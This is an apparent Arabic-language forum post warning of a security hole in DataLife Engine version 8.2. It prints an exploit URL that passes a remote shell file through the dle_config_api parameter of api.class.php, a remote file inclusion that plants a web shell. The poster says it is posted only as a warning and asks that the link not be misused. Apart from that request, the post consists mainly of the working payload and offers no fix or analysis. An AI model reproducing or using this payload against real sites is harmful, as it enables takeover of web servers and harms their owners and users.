السلام عليكم

للتنبيه فقط، توجد ثغرة امنية في مجلة داتا لايف انجين DataLife Engine الاصدار الاخير (8.2) ويمكن رفع ملف الشل من خلال هذه الثغرة:


نقره لتكبير أو تصغير الصورة ونقرتين لعرض الصورة في صفحة مستقلة بحجمها الطبيعي
كود PHP:
     
     www
.site/path /engine/api/api.class.php?dle_config_api=[shell.txt?] 
اطرح هذا الموضوع لأخذ الحذر فقط، ونرجو عدم استخدام الرابط في ما يسيء للآخرين